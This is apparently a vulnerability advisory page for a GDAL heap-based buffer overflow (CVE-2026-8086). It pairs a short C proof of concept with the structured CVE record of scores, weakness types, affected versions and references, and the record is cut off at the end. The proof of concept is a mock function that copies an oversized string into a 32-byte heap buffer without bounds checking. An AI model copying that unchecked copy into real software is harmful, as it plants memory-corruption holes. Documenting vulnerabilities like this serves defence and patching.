CVE-2026-8086

#include <stdio.h> #include <string.h> #include <stdlib.h> // Mocking the vulnerable function structure based on the description // In the real vulnerability, this resides in frmts/hdf4/hdf-eos/SWapi.c void vulnerable_SWnentries(const char* DimensionName) { // Simulating a heap allocation char* buffer = (char*)malloc(32); if (buffer == NULL) return; printf("[+] Processing DimensionName: %s\n", DimensionName); // VULNERABILITY: No bounds checking on the input length before copying // This leads to a heap-based buffer overflow strcpy(buffer, DimensionName); printf("[+] Buffer content: %s\n", buffer); free(buffer); } int main() { printf("PoC for CVE-2026-8086 - GDAL Heap Overflow\n"); printf("Triggering overflow in SWnentries via long DimensionName...\n"); // Create a payload larger than the expected buffer size (e.g., 32 bytes) char payload[100]; memset(payload, 'A', 99); payload[99] = '\0'; // Null terminate // Call the vulnerable function with the malicious payload // This simulates the local attack vector (AV:L) vulnerable_SWnentries(payload); return 0; }

{"cve": {"id": "CVE-2026-8086", "sourceIdentifier": "[email protected]", "published": "2026-05-07T19:16:03.110", "lastModified": "2026-05-08T19:04:48.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in OSGeo gdal up to 3.13.0dev-4. This issue affects the function SWnentries of the file frmts/hdf4/hdf-eos/SWapi.c. Such manipulation of the argument DimensionName leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 3.12.4RC1 is capable of addressing this issue. The name of the patch is 9491e794f1757f08063ea2f7a274ad2994afa636. It is advisable to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:osgeo:gdal:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.12.4", "matchCriteriaId": "42C34F23-189A-408C-B8DF-A7CD215EDB9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:osgeo:gdal:3.13.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "CBBA367E-AC85-4772-9522-12C10B9794EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:osgeo:gdal:3.13.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "A2E18623-F659-4CD5-8252-3F79C065A8CA"}]}]}], "references": [{"url": "https://github.com/OSGeo/gdal/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OSGeo/gdal/commit/9491e794f1757f08063ea2f7a274ad2994afa636", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OSGeo/gdal/issues/14356", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/OSGeo/gdal/pull/14361", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https: ... (truncated)